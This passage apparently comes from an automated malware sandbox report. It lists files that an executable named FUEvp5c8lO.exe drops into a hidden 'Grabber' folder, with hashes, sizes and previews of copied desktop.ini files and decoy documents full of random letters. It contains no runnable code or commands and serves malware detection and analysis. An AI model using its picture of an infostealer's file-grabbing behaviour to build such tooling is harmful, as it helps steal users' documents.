Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.0.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.0.8.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.7.....

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Pictures\Camera Roll\desktop.ini

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
MD5:	D48FCE44E0F298E5DB52FD5894502727
SHA1:	FCE1E65756138A3CA4EAAF8F7642867205B44897
SHA-256:	231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
SHA-512:	A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Pictures\Saved Pictures\desktop.ini

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
MD5:	87A524A2F34307C674DBA10708585A5E
SHA1:	E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
SHA-256:	D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
SHA-512:	7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Pictures\desktop.ini

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.514398793376306
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
MD5:	29EAE335B77F438E05594D86A6CA22FF
SHA1:	D62CCC830C249DE6B6532381B4C16A5F17F95D89
SHA-256:	88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
SHA-512:	5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Videos\desktop.ini

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.5218877566914193
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmclDmo0qmJclLwr2FlDmo0IWVvklrgl2FlDmo0qjKArn:QCGwv4o0o4o0mlLwiF4o090UsF4o01Ar
MD5:	50A956778107A4272AAE83C86ECE77CB
SHA1:	10BCE7EA45077C0BAAB055E0602EEF787DBA735E
SHA-256:	B287B639F6EDD612F414CAF000C12BA0555ADB3A2643230CBDD5AF4053284978
SHA-512:	D1DF6BDC871CACBC776AC8152A76E331D2F1D905A50D9D358C7BF9ED7C5CBB510C9D52D6958B071E5BCBA7C5117FC8F9729FE51724E82CC45F6B7B5AFE5ED51A
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.1.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.9.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.9.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.8.....

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\PSAMNLJHZW.docx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	PSA archive data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698960923923406
Encrypted:	false
SSDEEP:	24:mGnbK2uIv9xuPtDhsIChdpYx5eCmVRCqmDCL4yq/6jv:fpuVKIChHYve9RC2LpEK
MD5:	186B4E00711974F7AF578BD6FF959BBF
SHA1:	642B794D73FB09655FBFF8EDCAAA267634554569
SHA-256:	2505B69640298D08BF2DC435A6D289C1FE7ABB349D2017F63EAD8CD2C94199EF
SHA-512:	DD6260B7AF96C7449D3DB4826888F7EAD8F274F9E170E103D588B0AB00A044B5978544A10F7B3C0C8464B74FD10B087C5671177AC1468D7F172DF4E7644A336E
Malicious:	false
Preview:	PSAMNLJHZWSQDMAZGNPSQVJPYSFUCTTGDJYZLMXSOOEBVYTMYXCFKBUKVYFFHMXRUCYMSTINQFSWBKGZHWWOXSUHIJJAHELKVUMDNJZMRMZFKOUIQGCNVNZVXKWKRUMIVVNVMXPLQTYNNEISPTFLHCHCESXNGLPJCEUOVDOFSSNZDEVGGWGRIJYDNPIXZZQRIXXGAVNXXGMBNWDRPEIKJPBTWXUETHQXVKVNRJASMGUWQWQPUCAORVUSLGQPHEZAOFOACKQOBETERETOORPNJFKDGTDRHKRKEEAGCTYGGVCLOVTVNKIGBHRQXIREFRVVEMBZIDHIFEIOHPIJYGZWGTQWILPNZTDESONAGSHAQLUAVRKHMFOMOQYJXRVMLCUUJVOTUCVOEBKITXOZUZGZKCYNALMRPHSNXGINUBTOYHFDFQLRSZOZWPZGUFGNQWCZHZIXHOYMIXONKNPROHQRYFNTXULDHBFGYLGFAUXJWMFXTRDTCJKCQRMPSJWGMOUCEGLQWZCNKFEKFEUJJIUNMHRRSZPYMRYVQQYYPMGHHEKAQFKKXELSAQQLSLKKUPFWZCMCMFAINYSBZBCFXHKVLASFVZCXQXXXZLHZDHVGKAFBMUFYPUMCUFVZMLVFPOUFRVLCXBIJNSPUAJZYMLVZAAGXYNUCZCXJWFYMHPNYUZQZEKWRMDNWTUBEAPAAIVGGSWPFGRSUHMUGOYCHHBOMRHKMENUQTICOXQBOTOWXHARDPYNZYJCISYKDDFBREXFJNPUTCEDQXTRWWXEGLPLZBRUZXKHOJYFWTASZSDLWXBSEYMHYXZCADAYDPKFTVEVMYYPXPKGKKZUPTORUPLLMBXPDGYHRPPKYZOAWNEPPXHMTQWXMSQFVUTRDJEQKYSLZXRWAHJVOXMIJIPEMOVSQXZXCXSWRQRFYBFUTICJAAGKRSNWDBSGSEWJUBOEPILXBOYUDRCBRFHNBWDQPKBAZMBFBVNFLUTVKABREBJZU

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\PSAMNLJHZW.xlsx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	PSA archive data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698960923923406
Encrypted:	false
SSDEEP:	24:mGnbK2uIv9xuPtDhsIChdpYx5eCmVRCqmDCL4yq/6jv:fpuVKIChHYve9RC2LpEK
MD5:	186B4E00711974F7AF578BD6FF959BBF
SHA1:	642B794D73FB09655FBFF8EDCAAA267634554569
SHA-256:	2505B69640298D08BF2DC435A6D289C1FE7ABB349D2017F63EAD8CD2C94199EF
SHA-512:	DD6260B7AF96C7449D3DB4826888F7EAD8F274F9E170E103D588B0AB00A044B5978544A10F7B3C0C8464B74FD10B087C5671177AC1468D7F172DF4E7644A336E
Malicious:	false
Preview:	PSAMNLJHZWSQDMAZGNPSQVJPYSFUCTTGDJYZLMXSOOEBVYTMYXCFKBUKVYFFHMXRUCYMSTINQFSWBKGZHWWOXSUHIJJAHELKVUMDNJZMRMZFKOUIQGCNVNZVXKWKRUMIVVNVMXPLQTYNNEISPTFLHCHCESXNGLPJCEUOVDOFSSNZDEVGGWGRIJYDNPIXZZQRIXXGAVNXXGMBNWDRPEIKJPBTWXUETHQXVKVNRJASMGUWQWQPUCAORVUSLGQPHEZAOFOACKQOBETERETOORPNJFKDGTDRHKRKEEAGCTYGGVCLOVTVNKIGBHRQXIREFRVVEMBZIDHIFEIOHPIJYGZWGTQWILPNZTDESONAGSHAQLUAVRKHMFOMOQYJXRVMLCUUJVOTUCVOEBKITXOZUZGZKCYNALMRPHSNXGINUBTOYHFDFQLRSZOZWPZGUFGNQWCZHZIXHOYMIXONKNPROHQRYFNTXULDHBFGYLGFAUXJWMFXTRDTCJKCQRMPSJWGMOUCEGLQWZCNKFEKFEUJJIUNMHRRSZPYMRYVQQYYPMGHHEKAQFKKXELSAQQLSLKKUPFWZCMCMFAINYSBZBCFXHKVLASFVZCXQXXXZLHZDHVGKAFBMUFYPUMCUFVZMLVFPOUFRVLCXBIJNSPUAJZYMLVZAAGXYNUCZCXJWFYMHPNYUZQZEKWRMDNWTUBEAPAAIVGGSWPFGRSUHMUGOYCHHBOMRHKMENUQTICOXQBOTOWXHARDPYNZYJCISYKDDFBREXFJNPUTCEDQXTRWWXEGLPLZBRUZXKHOJYFWTASZSDLWXBSEYMHYXZCADAYDPKFTVEVMYYPXPKGKKZUPTORUPLLMBXPDGYHRPPKYZOAWNEPPXHMTQWXMSQFVUTRDJEQKYSLZXRWAHJVOXMIJIPEMOVSQXZXCXSWRQRFYBFUTICJAAGKRSNWDBSGSEWJUBOEPILXBOYUDRCBRFHNBWDQPKBAZMBFBVNFLUTVKABREBJZU

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\PSAMNLJHZW\AFWAAFRXKO.xlsx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6868290294905215
Encrypted:	false
SSDEEP:	24:hl+yWbugHn0w0RW4TAvC5oC6Rkc1ZqX+STxhexRov:hQhuTwqTAvIuOuQXVEov
MD5:	E655D05DEDA782A6FE1E44028236D3A4
SHA1:	ABEF573CA92D8CD16E5ACE5C300A6BF07DF79722
SHA-256:	69FC1A8F39F8BD7E956A4C8EC0EC6210E8F4C7E223B49C20369A2B47F8512528
SHA-512:	25837AEEB2772BF69684BDB344208188E115AA8FCB06D5428F84D2ED15F4972FC6874B128CA3682D28900F5C0EB8B305151F831962D3021EE7BBD1447DAE93F5
Malicious:	false
Preview:	AFWAAFRXKOIMYUTEBKLCFYUSMPKBLLVLYCZSBYQARRBIDNMYLPLGAIJYBPXZRRCDKWUJCZFNZYWJLJWCPPNWNBUNUKWKANAFJTGSMNDNAIPWYCCUGZTWCXIDUHLKDIIFXVZZCBKTKZXKYBFQHLHAZSPAYNVQVCNGPTZLFAFXAUGISISAIITTEUPNXLWBPAUSCWOXHRUCHKENHIUHQCSETCRINBBJCUJCYIOYZUPBJXJBLMSTCMXHMOOYHKSQGTGUNLEDPMCFDKWDGOSMWYQNXDCAOPAGZLPKXQZAOHSJXYLJUCZGAXOJOEPCWBHGGKSAPLRCJRDKCIWGATZZLSAOXFPFIENHFZCCEZCGGYAJEEPJFJLQIMPYUUETJJFOGGKKJKFAHPRMCUJNDGTXMLAAQDGEQMDULWDPCAUXZTYYGKAFFQQHIKQHEATUJZECMPTEBTRHCFGIZWCYGIGHIPVWFTPPXSNUTYHQCLGJLUYHHVMGFOMHJDNRGDZFHRGYQORTAJWLGOELYKCPIANQGCAXIZOMJZOECZGAHFWNUAKKTHLAANRBUSOZZLNWUYMXDOWPYUFYBOZZZBBJKPNMFGUCBOUWTXXWSNOBHKCPLGIWSWHHNCKLLLPPBPRJTKGRWMIZJYLWMDVWGJOTUQLYVUGUJQWNZKEUZQCQHKTCMGXBZDWEEFWYQHSYEMWFFVJUDOFEXELJGUUNXPBJCIQBKCMDGDRNTXYAXFDSLPAGXBTGBIVFXAHNXSFIPLCMCBKLQODIOGOBZMULDRUZUBRXZWXQVZCCWQVEIFCHMCTEYQXZKNSQZNYDUYGPGUQJEKUPPOTOWMMILZMISKYYGSRXUSSWEEQRNYBWLFXYWKGQPPVHKNOOXEDYWLCRNTNRKUIUKCYQNZCKIXAOIPCOTLEREPCLILYTQLFKBOOMXEVVODZEITSUPQITOXCNMSODLXIRGYOVFXWNRMVUQTMIZKKEVHOWKLXSZARGDNQKVXETZPBS

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\PSAMNLJHZW\AIXACVYBSB.jpg

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690067217069288
Encrypted:	false
SSDEEP:	12:wSQanHEC73FqjThUbJwuUn5qPyd2whRZfZOaH5KrqXzJI/y5bjbVMmRYAPL8fx7T:wHu73FWhUNwzqq2OfX82JdHRNPLcxdl
MD5:	4E32787C3D6F915D3CB360878174E142
SHA1:	57FF84FAEDF66015F2D79E1BE72A29D7B5643F47
SHA-256:	2BCD2A46D2DCED38DE96701E6D3477D8C9F4456FFAE5135C0605C8434BA60269
SHA-512:	CEC75D7CCFA70705732826C202D144A8AC913E7FCFE0D9B54F6A0D1EEC3253B6DEFFB91E551586DA15F56BA4DE8030AC23EE28B16BB80D1C5F1CB6BECF9C21BE
Malicious:	false
Preview:	AIXACVYBSBCZDJMZUDVNECMFSGJSAOAIXCJFDPHQJVUANUFFPQXVYJRUGYPJGKEJNXCBTXARAETAKFTJKVLIZEXLMOAPVEZRZZUIRDUKSPZRBPINNEKLCLXBHFZMBRJTUJZTRCGQGFRQCEVPUBAAPBHBTYYHDJZHHPMFAKXVJPQRQCRUFYPMNUCRRQOYXYEHXQEHWHFLZSBMLRRZFLLYUQLADTKEDXVDLKLPZTTCNAXMXPSTCHQKWMSRPNRZGULFHOTUOYUSIVJEHUYPRYGESSFFMBWDPFRMTVBZEHTJSPRMDJISAZPMEWNGPGIXXTDNHCOBSXAWEFWRZNECKZGORELWMEPSAPLSTZZPUKXURSKTFSUSFEZMXMAIMRJZNGCVKLOHPVMZEIXIISXVMQHQTSADYWZQSWYVJHHONOOSZPQVWIUFMVXBXYCJOMERCQSVXERFAOOENLKARQGTECAIXOXEZPFDFJHYFCKLADMCWYOMCITRHMECVVVNPNTSRXYGYRKZUTOFNBMHDZWYHPYLTWEIGWOIGBTHWYGIXBCUDYMZMTZNYQMZLMXKPNFZDUEXXQLFJZZZVOPBEZKTKTJCTNUPRCNNGCPTIHKPTGBJLGUENNUGTZVMZJGQGUVBRLOJZECBLINEKGSIRFWZPWMVYJNEPWGYIAHKMJRBZMRVIBPONMHBDQZYFBHDDMYBZZAFEPAQFFUPIGGYNSPVXUWNNCWAUZXAGCATPNHNNYICDCRMTKRODUCDDFZKHLISLVOIFZPDTOSIEREFHYEWUBJKJRWXMZUGCPUXCPEXUQPWTSKEYSDPEICDQMMKUKJLDNQEHQQCYKRMWOUSJVTVSZJTFZCDVNUMEIZFWDNWCNCSCHBYNKRUSXPVMRIHGXDUPKXMZUIELSRXMZAEUNCCYZTEYLUYYRNSFUTHFESJOLGKJVGGNVJKSFSETAIHYOMLBOPRYAHSCATJUXNTWVZPEMECBVVHKHDELQRTQBEBXPJJ

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\PSAMNLJHZW\PSAMNLJHZW.docx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	PSA archive data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698960923923406
Encrypted:	false
SSDEEP:	24:mGnbK2uIv9xuPtDhsIChdpYx5eCmVRCqmDCL4yq/6jv:fpuVKIChHYve9RC2LpEK
MD5:	186B4E00711974F7AF578BD6FF959BBF
SHA1:	642B794D73FB09655FBFF8EDCAAA267634554569
SHA-256:	2505B69640298D08BF2DC435A6D289C1FE7ABB349D2017F63EAD8CD2C94199EF
SHA-512:	DD6260B7AF96C7449D3DB4826888F7EAD8F274F9E170E103D588B0AB00A044B5978544A10F7B3C0C8464B74FD10B087C5671177AC1468D7F172DF4E7644A336E
Malicious:	false
Preview:	PSAMNLJHZWSQDMAZGNPSQVJPYSFUCTTGDJYZLMXSOOEBVYTMYXCFKBUKVYFFHMXRUCYMSTINQFSWBKGZHWWOXSUHIJJAHELKVUMDNJZMRMZFKOUIQGCNVNZVXKWKRUMIVVNVMXPLQTYNNEISPTFLHCHCESXNGLPJCEUOVDOFSSNZDEVGGWGRIJYDNPIXZZQRIXXGAVNXXGMBNWDRPEIKJPBTWXUETHQXVKVNRJASMGUWQWQPUCAORVUSLGQPHEZAOFOACKQOBETERETOORPNJFKDGTDRHKRKEEAGCTYGGVCLOVTVNKIGBHRQXIREFRVVEMBZIDHIFEIOHPIJYGZWGTQWILPNZTDESONAGSHAQLUAVRKHMFOMOQYJXRVMLCUUJVOTUCVOEBKITXOZUZGZKCYNALMRPHSNXGINUBTOYHFDFQLRSZOZWPZGUFGNQWCZHZIXHOYMIXONKNPROHQRYFNTXULDHBFGYLGFAUXJWMFXTRDTCJKCQRMPSJWGMOUCEGLQWZCNKFEKFEUJJIUNMHRRSZPYMRYVQQYYPMGHHEKAQFKKXELSAQQLSLKKUPFWZCMCMFAINYSBZBCFXHKVLASFVZCXQXXXZLHZDHVGKAFBMUFYPUMCUFVZMLVFPOUFRVLCXBIJNSPUAJZYMLVZAAGXYNUCZCXJWFYMHPNYUZQZEKWRMDNWTUBEAPAAIVGGSWPFGRSUHMUGOYCHHBOMRHKMENUQTICOXQBOTOWXHARDPYNZYJCISYKDDFBREXFJNPUTCEDQXTRWWXEGLPLZBRUZXKHOJYFWTASZSDLWXBSEYMHYXZCADAYDPKFTVEVMYYPXPKGKKZUPTORUPLLMBXPDGYHRPPKYZOAWNEPPXHMTQWXMSQFVUTRDJEQKYSLZXRWAHJVOXMIJIPEMOVSQXZXCXSWRQRFYBFUTICJAAGKRSNWDBSGSEWJUBOEPILXBOYUDRCBRFHNBWDQPKBAZMBFBVNFLUTVKABREBJZU

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\PSAMNLJHZW\XZXHAVGRAG.png

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\PSAMNLJHZW\ZSSZYEFYMU.pdf

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698801429970146
Encrypted:	false
SSDEEP:	24:qYZf7NYgK11E+8TKka0vEdKPG8TQZjtLMiMl+gc:Zk1k3a0Ma18Z4A
MD5:	488BC4EF686937916ECE6285266A6075
SHA1:	498BA8EBDA3DABD222532DB0C0D6262B0C5A7E08
SHA-256:	8DEB161A95E22B50B1BD88EDBBB4312003788B8A6B35D22AEC02CC200FF34C17
SHA-512:	1B7AC223F6277A74893597499F79D674E0798699081B0B2602123B9118E3F68815A951F787E71E5C35589E5AACF987E9C8F669FF9A9F6E94209F15DADEFF40A3
Malicious:	false
Preview:	ZSSZYEFYMUQEKZVPQBMSGZPGFJSTPVKSKKYYOJJIVKJRXMBDCMKBNSXEZOYYLLCVGBCQCKVUSXHLTTLRBHPCNSEMRROKBXFGQJZTBAVNRJJQBKWQYWINUTDWXUKTWQTLFVKQJLRXVFMCOZRZYQJKBITZONPSKVFYGVFRXBDOVYHVEMAQOEYMKHGFIUSMUZFLKRKBNYFQULYASQJWIMXTPKLTXNGJEWMVSDMVYEHMDPUBWHXLMDGALITFYOPNEIQSZIFTQVUSLRLYPKRTXNKPZMOTSFMCTTCARDYTVYJNZYBYCYFEMWWKCHMOTEZUTCREBZPMVCXBYPYANERMGIWQGRLDPRJEURITRIHETMYHEDRHVZWCMDHNFFZGLKKJQGCRIABTVOOSCMRDMCYBMDQOGHUUZIQUDIGWJEDYSILALQBOBHJCJXMYCXWMKWTAZTAUZGCOOYTBWHVSAMUGEMKVHNGWYROVAEWXIOJKNUUAHUZJKSBJBZHYPRMGXULRNKCEDZBZFSCLCLARQDJMLPUKDSUWUIZMUDIKRKQZKQOXAYQYQTWHEIQXYYRXUJUIJQHETOHAPWXNCXFRKNXDPMNGFVZLBDFQUQRTHWUPUFFOEETFIAMWILGGLMPNTNBWFAVUGTBECKTLKLZQTWDYQGKSATWYWCKMJUIBSPWHFOXTNCPNZROSZPOSCRTUVGPSNZPJGXCOSDTDGNOFJGXANNYNPDRWRWHRMJKJZLEGOXMOOUXTCHTTXGYUQDVKJZMOUPMXIJCGGEIUPFMUDPJPVMINFDESCQIALHEUSISIOWESWYRPEKDPMSSUALHIWLZBLYGOHEFVJWNLRWWTIYJVKFFZJKDTZXWMWMLHMPMCDJASZUPRTYGWPHHTFMTSSQIBOUWXAGDKQACWGATARXNPCMQFCVREPARZFKWLUWYDUSCBVSUXEQBCXPUESWMVITZYZKPVGHRQVMKQXDEITVASTNPYLAQHWTYQQEBOGBVRUVAJ

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Documents\QVTVNIBKSD.docx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695938097013837
Encrypted:	false
SSDEEP:	24:z3kwMX3+NBj4ilMczAMBVgs3WrV8bfMbETQzpns7vh2HCpPQ:bkww3UGiJyGWr3RMvh2HC9Q
MD5:	DC3E834A02B2C81DF0167ACE639BA00F
SHA1:	32859A24EE65CBB3BD804D02639FCC4745C1CBC9
SHA-256:	0034D483C5EB801444D442E100E6B97859FB3752243C3323578F94083F469A29
SHA-512:	CA0BEDA568B13F4522ABFCBD8E73CD96AEEF991C8896E5C9F03D999722498840CFF29265340F8D86267E8E134085300FF8D42EC5E4741229332DEAD4B30E6D0F
Malicious:	false
